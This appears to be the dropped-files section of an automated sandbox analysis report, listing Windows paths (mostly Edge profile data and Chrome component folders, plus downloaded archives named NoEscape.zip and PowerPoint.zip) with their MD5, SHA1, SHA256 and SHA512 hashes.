SHA512 60f771a87d833ceaaff77fac7ac050da8032a9aa7c582466e1530e730440b7b1420288cdf4fb983e4d5b08a431723c66620cf2590533f6ca9a6968ca9c80da22

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_951548711\manifest.json

MD5 c3419069a1c30140b77045aba38f12cf
SHA1 11920f0c1e55cadc7d2893d1eebb268b3459762a
SHA256 db9a702209807ba039871e542e8356219f342a8d9c9ca34bcd9a86727f4a3a0f
SHA512 c5e95a4e9f5919cb14f4127539c4353a55c5f68062bf6f95e1843b6690cebed3c93170badb2412b7fb9f109a620385b0ae74783227d6813f26ff8c29074758a1

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1825005940\LICENSE

MD5 ee002cb9e51bb8dfa89640a406a1090a
SHA1 49ee3ad535947d8821ffdeb67ffc9bc37d1ebbb2
SHA256 3dbd2c90050b652d63656481c3e5871c52261575292db77d4ea63419f187a55b
SHA512 d1fdcc436b8ca8c68d4dc7077f84f803a535bf2ce31d9eb5d0c466b62d6567b2c59974995060403ed757e92245db07e70c6bddbf1c3519fed300cc5b9bf9177c

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1825005940\manifest.json

MD5 7f4b594a35d631af0e37fea02df71e72
SHA1 f7bc71621ea0c176ca1ab0a3c9fe52dbca116f57
SHA256 530882d7f535ae57a4906ca735b119c9e36480cbb780c7e8ad37c9c8fdf3d9b1
SHA512 bf3f92f5023f0fbad88526d919252a98db6d167e9ca3e15b94f7d71ded38a2cfb0409f57ef24708284ddd965bda2d3207cd99c008b1c9c8c93705fd66ac86360

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments\2025.1.17.1\keys.json

MD5 bef4f9f856321c6dccb47a61f605e823
SHA1 8e60af5b17ed70db0505d7e1647a8bc9f7612939
SHA256 fd1847df25032c4eef34e045ba0333f9bd3cb38c14344f1c01b48f61f0cfd5c5
SHA512 bdec3e243a6f39bfea4130c85b162ea00a4974c6057cd06a05348ac54517201bbf595fcc7c22a4ab2c16212c6009f58df7445c40c82722ab4fa1c8d49d39755c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ad126166c04af9946aa67035ed065558
SHA1 70237369421bff77b9904a6f56c3bc57e08bf7ac
SHA256 149860a3863f0143aec094976778af22ea1dd76afb1b855e105d45f04821829c
SHA512 f690a8b9ce02aa4f05d646f44e2b17c15e17594d87357332bf57af349120f18ed0195971d88e94ac7548eaee18550d343998f21bab19a4168a29fd8aa3e80bde

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1090327237\manifest.json

MD5 6607494855f7b5c0348eecd49ef7ce46
SHA1 2c844dd9ea648efec08776757bc376b5a6f9eb71
SHA256 37c30639ea04878b9407aecbcea4848b033e4548d5023ce5105ea79cab2c68dd
SHA512 8cb60725d958291b9a78c293992768cb03ff53ab942637e62eb6f17d80e0864c56a9c8ccafbc28246e9ce1fdb248e8d071d76764bcaf0243397d0f0a62b4d09a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 a8246c81c089b3dc47882d37699f04b4
SHA1 20bb268535ca27c3dc12ed966b5095177756e53a
SHA256 5eb2e52259a708b05ac9a02e0b6ff3c1fb6e67444708d59f2f5308e4ad7328c7
SHA512 9d7fdd758eba6da3d44e833daae7110b416c5c2064330f0ffc47238cd464083280b80f2df39e784ef81695b7141e5e9e9d9963f2f36eaa229feb6da1430a7c83

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_96667937\manifest.json

MD5 cb10c4ca2266e0cce5fefdcb2f0c1998
SHA1 8f5528079c05f4173978db7b596cc16f6b7592af
SHA256 82dff3cc4e595de91dc73802ac803c5d5e7ab33024bdc118f00a4431dd529713
SHA512 7c690c8d36227bb27183bacaf80a161b4084e5ad61759b559b19c2cdfb9c0814ad0030d42736285ee8e6132164d69f5becdcf83ac142a42879aa54a60c6d201b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.15\edge_autofill_global_block_list.json

MD5 afb6f8315b244d03b262d28e1c5f6fae
SHA1 a92aaff896f4c07bdea5c5d0ab6fdb035e9ec71e
SHA256 a3bcb682dd63c048cd9ca88c49100333651b4f50de43b60ec681de5f8208d742
SHA512 d80e232da16f94a93cfe95339f0db4ff4f385e0aa2ba9cbd454e43666a915f8e730b615085b45cc7c029aa45803e5aca61b86e63dac0cf5f1128beed431f9df0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.15\v1FieldTypes.json

MD5 c1a0d30e5eebef19db1b7e68fc79d2be
SHA1 de4ccb9e7ea5850363d0e7124c01da766425039c
SHA256 f3232a4e83ffc6ee2447aba5a49b8fd7ba13bcfd82fa09ae744c44996f7fcdd1
SHA512 f0eafae0260783ea3e85fe34cc0f145db7f402949a2ae809d37578e49baf767ad408bf2e79e2275d04891cd1977e8a018d6eeb5b95e839083f3722a960ccb57a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.15\autofill_bypass_cache_forms.json

MD5 8060c129d08468ed3f3f3d09f13540ce
SHA1 f979419a76d5abfc89007d91f35412420aeae611
SHA256 b32bfdb89e35959aaf3e61ae58d0be1da94a12b6667e281c9567295efdd92f92
SHA512 99d0d9c816a680d7c0a28845aab7e8f33084688b1f3be4845f9cca596384b7a0811b9586c86ba9152de54cafcdea5871a6febbee1d5b3df6c778cdcb66f42cfa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 f586f1ece9d49e63bed15ba00892b5bf
SHA1 df018f57bf0f2348f575c890efe8f4328205251b
SHA256 70c87e0143a6384e294a5d9a5272eff07fc9358e8df0d00d8044bd2540ebc8c8
SHA512 07c24ab001286f9fa6642d2dc47430684f4340b8ef7a2adc7ac7e373fd598ce37dffc4d0b4cb1f2e882032df3e44e58613014da67ad8769956014b772d23344f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter~RFe5a55f1.TMP

MD5 af6e1a535a98781685c8b8f38eeceafd
SHA1 da103e45dbb534d3ca7d7981e04d6bcda64d6e17
SHA256 682b66dab93bd75cee0aed25088a871299cc1501de764cc893e8943e6cb5143e
SHA512 3a52f1bc634601f2fc71444b578aea94f8fb0334d10ca987f9676462cbd95630afde799ca1b7ee5023a86b8d231da6eb153ab53f1f78329743f7da4685a17a88

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00007b

MD5 89ee4d8818e8a732f16be7086b4bf894
SHA1 2cc00669ddc0f4e33c95a926089cea5c1f7b9371
SHA256 f6a0dfa58a63ca96a9c7e2e1244fcff6aea5d14348596d6b42cd750030481b82
SHA512 89cc7dfae78985f32e9c82521b46e6a66c22258ebe70063d05f5eb25f941b2fd52df6e1938b20fe6c2e166faa2306526fdf74b398b35483f87b556a052b34c5e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 465be294c5bb3d6dc83a303a474ce067
SHA1 e88cb7cf366eb86910b94069082baf730dc616e7
SHA256 a4a5b3e680c24b71bc6987b4852bca7d776b355fdccfb16b8ef0125fa6aa8d28
SHA512 b8167647e34667ce3363d80e093f17715719e73961cc99ba4e8eec9337616c2c1dd0d17327d699ab4e9e5645bf0ee4d223ad194d8cf81723f15e31ebff68e114

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 9b073327c514724341be4b68fb3247b1
SHA1 7b978e9be1697e4c52db26b9624ee06bf3207406
SHA256 d8cde4a6c47849989ca174dc66e529429b0bbba17f8641a31c53b1e740500413
SHA512 bfa05c215ea2faeeb7466a77868f3080ce5a8e140e9b0796c3c17ef3485e279647f38a43bfb4b51ce4f5a96a3a36c60a7d47b5e3754ccc3a8714199d01070cec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.3.10\data.txt

MD5 60beb7140ed66301648ef420cbaad02d
SHA1 7fac669b6758bb7b8e96e92a53569cf4360ab1aa
SHA256 95276c09f44b28100c0a21c161766eda784a983f019fc471290b1381e7ed9985
SHA512 6dfa4eca42aea86fba18bc4a3ab0eed87948ea1831e33d43426b3aca1816070ecb7fd024856ad571ca2734214a98cc55e413502b3deef2c4a101228a7377e9d5

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1476549494\manifest.json

MD5 22b68a088a69906d96dc6d47246880d2
SHA1 06491f3fd9c4903ac64980f8d655b79082545f82
SHA256 94be212fe6bcf42d4b13fabd22da97d6a7ef8fdf28739989aba90a7cf181ac88
SHA512 8c755fdc617fa3a196e048e222a2562622f43362b8ef60c047e540e997153a446a448e55e062b14ed4d0adce7230df643a1bd0b06a702dc1e6f78e2553aadfff

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 e4114ee2f1e384511b230527d6e0374c
SHA1 b3334daef928bce8966ad297962a768e28c8b491
SHA256 319773c2f021362c4ab9e39147994e2e368a4224b42c3dcc58b20456fe9a407b
SHA512 f4452d7f6bbd2a935cf9d4eb0d86d1c58918a1fd93576d07eb040d0afca78fd5b094fb87d5cdb31e59ae8cb1b6d9682d06ba1c72c8cb9a94a5268a87c4c79ad5

C:\Users\Admin\Downloads\NoEscape.zip

MD5 ef4fdf65fc90bfda8d1d2ae6d20aff60
SHA1 9431227836440c78f12bfb2cb3247d59f4d4640b
SHA256 47f6d3a11ffd015413ffb96432ec1f980fba5dd084990dd61a00342c5f6da7f8
SHA512 6f560fa6dc34bfe508f03dabbc395d46a7b5ba9d398e03d27dbacce7451a3494fbf48ccb1234d40746ac7fe960a265776cb6474cf513adb8ccef36206a20cbe9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 0daa0740fb95a65a5bd10633c088120d
SHA1 28c9baef37de90fe4d8f08d23dd183fa8a5b7b78
SHA256 6ed103128466d9cb9eecf75fa918068524f77d59b6054f872a75d31522fc87b0
SHA512 94558b8e1074d1fb6120a0d86a5d8a1ef47ab423b8f3a622feff4e51a75bbefd0ac013877ba0c0a3d82c240b28eee2506ed8aff757d223fcd65b4789394b1d8b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 091d33a5b3a1fb8085105ffd44943395
SHA1 d5a76cb90ce0c83dba768bd88f2a086641c50ebf
SHA256 edd69024357c79df726724f95f01f39ba1e21cc2b0384e5009bd22d6e1235224
SHA512 63deb7d7859347142763b7a5cdd1b8d45de49ea71398c46b0b8bfc0404b388b31c9036637d45cc0f917a0c35fb29a38381719a7c236c1c5ee4ab1f11da269e75

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c12b2c9e5254d89ad9762f9c388e86d7
SHA1 a80c6e00a3ff823583ccef4b3f5a473170fede5f
SHA256 9fbb51698e24bd558e8f54183aed8ab6bf8d463edb6da34a6b306731d296dbd7
SHA512 3247737c63ee5128f004ad1a60e0bcf8de78623777ece952c25e8544236cc0f360f348f7d3edc09a3f0f59868ad011c05cd8c637b0c3ac46837892269f99deb4

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1624005410\manifest.json

MD5 78b473ee6bb38cbb39886624887efe63
SHA1 d40fe3eba931ed08c8a68907ba20773a9987b3ce
SHA256 3a4a45d0995fcb759016fd1d875e1fc913a14236e8f7d3ae31930ee3f0477329
SHA512 92d03db5c60d0a805c896865e245e25ca43675677237e2dc38e82336cd3ac239e0dd878046d5bbfa50ec3206392857ac3305d64da6d1605e22b76a4f3e69ad18

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Typosquatting\2025.4.20.1\typosquatting_list.pb

MD5 488a70b7d4621e059e32d395221223aa
SHA1 774b5a2124f5c3d8d210020dc53e5033b04a5f76
SHA256 8c87afec8dba2f1a072c3fbecc7fa8fb81e93a64639bf9c00e24b4bb712b57a6
SHA512 bab1b4716e5faf0054cc93a969d1a79e6ee9d11d054d102afa0ba564142f444cbe9508aa013f118b701e4ca5283b0ef5a3a4859a67709a441bcbb8b25e78ca09

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 b26e61e78dd9c1f8ef75baa1170b3a19
SHA1 1e1e5eb6e992f219c82701e1744803e805b30d45
SHA256 748b9995a14348167839cc35723761fa45194ffbc929eb945177a78145f886e0
SHA512 29156be701eb9d631d3d3856113e59d8a2acbe9125d1b11e5d2701b41acb27ab1701efe671c4247199029376208a9098ec73f8134868d076de2430287b04d349

C:\Users\Admin\Downloads\PowerPoint.zip

MD5 196611c89b3b180d8a638d11d50926ed
SHA1 aa98b312dc0e9d7e59bef85b704ad87dc6c582d5
SHA256 4c10d3ddeba414775ebb5af4da5b7bb17ae52a92831fe09244f63c36b2c77f34
SHA512 19d60abf83b4a4fe5701e38e0c84f9492232ceb95b267ae5859c049cea12fee2328a5d26ffd850e38307fb10cb3955b7e5e49d916856c929442d45b87071d724

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 127405defb06cd76eb1462ebdd9ffc8c
SHA1 d93b891c62b7ae50cc7c2aba0fed3135340998c8
SHA256 f47e7c455de324e98f9f81b3bb739b976ee33daa266a7b9dbcdbe9e5a3128225
SHA512 ccae1f879a3aa8b62594eba26ed82161c7b1b5f079e43ece84f6644d9161d69c430c7d8555b9e191994bc67b21183980d17fcfd7349c010001249927717c3aa9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 73621e24337f619a1ed67f73ab638b41
SHA1 f1036944667ff7d721ff1ac186e958a4a36e5530
SHA256 b2a7a8119333fb86cd21423405b26e5e799ec77cd80fc0357fc90f9b2d7a56e4
SHA512 69c1bfe790e1c9f714a169c3a97eb51aa0cd60b0476a47e4113e6b39e26556fe6ae9e1913f8ca591da370d4457732919fd85581eb3b5d884f53d39fa6d17c747

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-as.hyb

MD5 8961fdd3db036dd43002659a4e4a7365
SHA1 7b2fa321d50d5417e6c8d48145e86d15b7ff8321
SHA256 c2784e33158a807135850f7125a7eaabe472b3cfc7afb82c74f02da69ea250fe
SHA512 531ecec11d296a1ab3faeb2c7ac619da9d80c1054a2ccee8a5a0cd996346fea2a2fee159ac5a8d79b46a764a2aa8e542d6a79d86b3d7dda461e41b19c9bebe92

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-hi.hyb

MD5 0807cf29fc4c5d7d87c1689eb2e0baaa
SHA1 d0914fb069469d47a36d339ca70164253fccf022
SHA256 f4df224d459fd111698dd5a13613c5bbf0ed11f04278d60230d028010eac0c42
SHA512 5324fd47c94f5804bfa1aa6df952949915896a3fc77dccaed0eeffeafe995ce087faef035aecea6b4c864a16ad32de00055f55260af974f2c41afff14dce00f3

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-nb.hyb

MD5 677edd1a17d50f0bd11783f58725d0e7
SHA1 98fedc5862c78f3b03daed1ff9efbe5e31c205ee
SHA256 c2771fbb1bfff7db5e267dc7a4505a9675c6b98cfe7a8f7ae5686d7a5a2b3dd0
SHA512 c368f6687fa8a2ef110fcb2b65df13f6a67feac7106014bd9ea9315f16e4d7f5cbc8b4a67ba2169c6909d49642d88ae2a0a9cd3f1eb889af326f29b379cfd3ff

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\manifest.json

MD5 2617c38bed67a4190fc499142b6f2867
SHA1 a37f0251cd6be0a6983d9a04193b773f86d31da1
SHA256 d571ef33b0e707571f10bb37b99a607d6f43afe33f53d15b4395b16ef3fda665
SHA512 b08053050692765f172142bad7afbcd038235275c923f3cd089d556251482b1081e53c4ad7367a1fb11ca927f2ad183dc63d31ccfbf85b0160cf76a31343a6d0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 fa41f7f296709be009a4a7d8b414f718
SHA1 262bb55a78eb5392749a8da724e8a4a4564b7e6d
SHA256 39a8a766ead966e4277df16c52a423e2cfa6a32d71775bd43243ce440ce83d66
SHA512 ca8d519e0725028ae69865fb64204c2bee286bcea28ab1cc440f689bed36a225590f366ca49068d9258a43e08a24b2284f6eaeaa3dc12c3e421c73bd9e3e4ec5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old

MD5 fb54696b11c872d9be7807dcb9e3fe45
SHA1 667ebe165cd9368177d82ec4d1967f7a035307de
SHA256 ad187a870d5e2eba50c150f52a21d99a12a281ecaf82905daf4e811992cb07e8
SHA512 e6e122bd74e99a545b2df6c665b796f57524674773636a170e507fa2e74b43cff8c0ff092e460204255f667a067f6b7906afbc3531e96483c61e276e1535451b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\672850e0-716b-4785-b971-03b7429b7632\index-dir\the-real-index~RFe5c4425.TMP

MD5 8391dcfdd268028d93f6d0636d999b79
SHA1 7b221f43e580dd400c4905ed7205d5233e7110c3
SHA256 12a910b7db201a46fecba3010a7a7c3721284263ea96e3129d37b2629030b5d7
SHA512 718b14cc3b527019fc0bb79f38b4aab50d913eabad9d82653a2856b466b8a84b40d7031a13f7e530ae44d45e25b8b440695873be04b3c86f39d8ed73731d0345

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\672850e0-716b-4785-b971-03b7429b7632\index-dir\the-real-index

MD5 f57c6058f0148c42c2ea53d93cf60515
SHA1 1f65659117e43d35b3365b7426d2e9e35fcf5fdb
SHA256 213a39545cc44325db3e3a56b7a8d1a8275967bdf9d93f3b463992424da144f1
SHA512 ec602155c35a6272970cf7fc402a6d86a1be37dae84f0786aa1c3069a3f718b0f0fc75f8198c9f0174395b0e5810aeae7839d4128b4f059a2c3dec957cc033cf

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_833700207\manifest.json

MD5 d20acf8558cf23f01769cf4aa61237e0
SHA1 c4b21384309b0ff177d9cd3aa4198ab327eb2993
SHA256 3493b321a7fc5e183ed6f223ae55ce962541717d0b332d16bdc7cbcadf7e6f78
SHA512 73d082cbd71f6d0f06c7afc1bf63ee41c9a8e501df3e56f21a551b2d369a0afc8306894c8e0a38d0324e2ac403ec506ac1ecd8e9b61a9cb27134a229ccb13725

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.76\LICENSE

MD5 aad9405766b20014ab3beb08b99536de
SHA1 486a379bdfeecdc99ed3f4617f35ae65babe9d47
SHA256 ed0f972d56566a96fb2f128a7b58091dfbf32dc365b975bc9318c9701677f44d
SHA512 bd9bf257306fdaff3f1e3e1fccb1f0d6a3181d436035124bd4953679d1af2cd5b4cc053b0e2ef17745ae44ae919cd8fd9663fbc0cd9ed36607e9b2472c206852

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.76\Filtering Rules

MD5 d7c9c6d2e1d9ae242d68a8316f41198c
SHA1 8d2ddccc88a10468e5bffad1bd377be82d053357
SHA256 f215127185b2ee6b01e12b6ca75d3e5c4e454598dd4aed36124ae13d59afd547
SHA512 7fd14824e9200dd99e1fd2cee402656dc0cfc3d0a60058c5eb05c68e9e65b7f0b47e550fb4d6c2b59eba204dbf3ef9e69dc9723b43a9b3ccd5412d6b77715fc3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

MD5 d2df1160aa82d0bc78529389c0ccb5e6
SHA1 1eab3797dbd302ca826e0fe64431ecc0e2290232
SHA256 57189f4f5e217ae4fd174edc10c2ed08ec38f9d80b263def715cf8e3ee209916
SHA512 994db6b70585dfccf879b77b9a75afe03241220240b925977901f72f6c93428f5c0d6c17cdf216956984b722ea1368e855cf4c680c86ccefbfdf0b03708bc104

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 b83077ed286e1701c06f94c410a272c5
SHA1 fb4e514c3cc4032c0d9101489b71b35fe2884acd
SHA256 f349e70a319d35784fff06af07d4bfe06d47cd59d683742e5f1f1c3c272a795b
SHA512 fe8dc83b1ca549e4b870935677167a4374733a81bee9ed695940321380a06e3f20e50fe8201989aecf15334ae5099d668a2b54e692fe02777398d8589b75353c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.1.39.0\edge_checkout_page_validator.js

MD5 1db0c159a8afc8073ed9f0a83f782ae8
SHA1 0874d03928cc347db7f5c7720fa6c23321671fb7
SHA256 f7ee28dee8d78ac7456a683cbc673e8b3b57bc9a1ba37c0d6d5d4332a7534d93
SHA512 4fda31e15918efa31ebbd69965e3fa1702daf6b1995af2c010a63e55030ee2f3affb4c45ea6275b7d4c35c0e61bdfbd3051872f392725394489b4c43e8cb3bf1

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_753594006\manifest.json

MD5 207f8230e8e90b79c9a957fcecb35037
SHA1 838fd6a9aa7ac1083a1b0cdaa29ed39e7e593a51
SHA256 fcd7d9808d01ba6f20fef9d34aa6dfaed249bfedf85cf12ce8299d58df3250a1
SHA512 8cf890bcb56d20f45a91b6d46940f7a5cf98307cd80ca05561704a2965f2984634dfd3a07d3aac089cbb2c8fafdf74b8152fc1f6c1404fe338c5eac4efa5f5f2

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\manifest.json

MD5 0d77c27baa669b0714c49b73e68447ea
SHA1 65103c9707e083c5503ad9979560ba1bb7634ae4
SHA256 c853d6a286d9d31a382c6d3fb109d5336d275651950f22b8243289eb6125b516
SHA512 1f011c405ec558229a1f5e2923b38b7054144c66d4c69d658c9c2c371f6cc365317485c274cafcab80bcb88f989b0be4c43c763933de3f86362a79ec1e962ff3

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\Tokenized-Card\tokenized-card.bundle.js.LICENSE.txt

MD5 8595bdd96ab7d24cc60eb749ce1b8b82
SHA1 3b612cc3d05e372c5ac91124f3756bbf099b378d
SHA256 363f376ab7893c808866a830fafbcd96ae6be93ec7a85fabf52246273cf56831
SHA512 555c0c384b6fcfc2311b47c0b07f8e34243de528cf1891e74546b6f4cda338d75c2e2392827372dc39e668ed4c2fd1a02112d8136d2364f9cab9ee4fa1bd87f5

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\Notification\notification_fast.bundle.js.LICENSE.txt

MD5 7bf61e84e614585030a26b0b148f4d79
SHA1 c4ffbc5c6aa599e578d3f5524a59a99228eea400
SHA256 38ed54eb53300fdb6e997c39c9fc83a224a1fd9fa06a0b6d200aa12ea278c179
SHA512 ca5f2d3a4f200371927c265b9fb91b8bcd0fbad711559f796f77b695b9038638f763a040024ed185e67be3a7b58fab22a6f8114e73fdbd1cccdda6ef94ff88f3

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-tokenized-card\fr-CA\strings.json

MD5 cd247582beb274ca64f720aa588ffbc0
SHA1 4aaeef0905e67b490d4a9508ed5d4a406263ed9c
SHA256 c67b555372582b07df86a6ce3329a854e349ba9525d7be0672517bab0ac14db5
SHA512 bf8fa4bd7c84038fae9eddb483ae4a31d847d5d47b408b3ea84d46d564f15dfc2bae6256eac4a852dd1c4ad8e58bc542e3df30396be05f30ed07e489ebe52895

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\json\wallet\wallet-tokenization-config.json

MD5 ae3bd0f89f8a8cdeb1ea6eea1636cbdd
SHA1 1801bc211e260ba8f8099727ea820ecf636c684a
SHA256 0088d5ebd8360ad66bd7bcc80b9754939775d4118cb7605fc1f514c707f0e20d
SHA512 69aff97091813d9d400bb332426c36e6b133a4b571b521e8fb6ad1a2b8124a3c5da8f3a9c52b8840152cf7adbd2ac653102aa2210632aa64b129cf7704d5b4fa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\json\wallet\wallet-notification-config.json

MD5 4cdefd9eb040c2755db20aa8ea5ee8f7
SHA1 f649fcd1c12c26fb90906c4c2ec0a9127af275f4
SHA256 bb26ce6fe9416918e9f92fcc4a6fe8a641eceea54985356637991cf6d768f9fd
SHA512 7e23b91eab88c472eec664f7254c5513fc5de78e2e0151b0bcc86c3cd0bf2cb5d8bb0345d27afdd9f8fcb10be96feaa753f09e301fa92b8d76f4300600577209

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\json\wallet\wallet-stable.json

MD5 05f65948a88bd669597fc3b4e225ecae
SHA1 5397b14065e49ff908c66c51fc09f53fff7caed7
SHA256 0e329e63d8457bef61d0986a521f81d747a09dadf3b1136f2011942ba14d9fc0
SHA512 ed7b767a741d18c0dd35e0311db752120e0f090d39ef976d541cbc5ae78fa32655cb3f9c27cddef6ca8091ca8bf31513254a748bc8b95353897f6198a667cf58

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\json\wallet\wallet-checkout-eligible-sites.json

MD5 16d41ebc643fd34addf3704a3be1acdd
SHA1 b7fadc8afa56fbf4026b8c176112632c63be58a0
SHA256 b962497993e2cd24039474bc84be430f8f6e6ab0f52010e90351dc3ff259336c
SHA512 8d58aa30613a2376ccc729278d166a9b3ec87eca95544b9dec1ee9300e7dd987326ea42d05dca3f1cc08186685f2fdaf53c24fd2b756c1ed9f2b46436689dc74

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 0f0a8acf10a0b763d66c23bead07528c
SHA1 92bf04a3ea58ce76862db2cf004bbb704b997b05
SHA256 50b6b3ebed85e3a64e0b2ab0f47afa074e6189f28c4ad73b279e1549b594e069
SHA512 3f1f7ba26e5c6e114303a3bf54bb75b7cf0931a1e0cb7116dafd64c1061f09323ead6f5732776eeb9fae64f5ea5d9b390c74b7dd5da38e54d478665b8fa5a7d4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\wallet_donation_driver.js

MD5 03abcce3f9828372d9876aa2e6fcdbb0
SHA1 cf5834e1af5f7143e62a29ae0f7ede79178b3574
SHA256 39a63d56be4f1ca950310f385e8a42f7bc2dcc0e49fefff306176182bfa4f0e5
SHA512 ef9b7decb4cfee3961006ea5c77299a48fe6a667475772f2a78e93bd4f691dc4700f8008138c574898fdcd8d717d84b8b201527ddb5a61346e05d362aeb15701

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008a

MD5 1bd4ae71ef8e69ad4b5ffd8dc7d2dcb5
SHA1 6dd8803e59949c985d6a9df2f26c833041a5178c
SHA256 af18b3681e8e2a1e8dc34c2aa60530dc8d8a9258c4d562cbe20c898d5de98725
SHA512 b3ff083b669aca75549396250e05344ba2f1c021468589f2bd6f1b977b7f11df00f958bbbd22f07708b5d30d0260f39d8de57e75382b3ab8e78a2c41ef428863

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008c

MD5 638b28824ff7d2a8b5eca31267ffaf3d
SHA1 51c91fb5de5248d6dbbe194565231c4bbbc197fb
SHA256 a2477313b8f9735a83fff20ff6624d26a13c893601a3cf6148bc997022913011
SHA512 0eb506d4d9f7bf3aef60dc2d69135a1eb6c9748eca15f721cf5310a7bfe131e21c3504dd75ad986ddfcde907cedd8522caa64845de1794000c2fe7a477189af5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008d

MD5 d6b36c7d4b06f140f860ddc91a4c659c
SHA1 ccf16571637b8d3e4c9423688c5bd06167bfb9e9
SHA256 34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92
SHA512 2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008b

MD5 226541550a51911c375216f718493f65
SHA1 f6e608468401f9384cabdef45ca19e2afacc84bd
SHA256 caecff4179910ce0ff470f9fa9eb4349e8fb717fa1432cf19987450a4e1ef4a5
SHA512 2947b309f15e0e321beb9506861883fde8391c6f6140178c7e6ee7750d6418266360c335477cae0b067a6a6d86935ec5f7acdfdacc9edffa8b04ec71be210516

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\buynow_driver.js

MD5 412352a121a62092628029e9b30158d8
SHA1 0021445df04bcd60cd83b670ce1863c42f1f4c11
SHA256 87339a1e25ccbbf120f294fd60333e292e1d631e785a9b205ed5beb0128c214f
SHA512 ffd266f1161ab996f38a6d0723e2cf96840b500cf2aa360f48b7953d448a5cd3a2fffa666d9be9c89dc4495497d5016f1199e6419a82bdf18fc99b8a8a4eb596

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\2\IndexedDB\indexeddb.leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

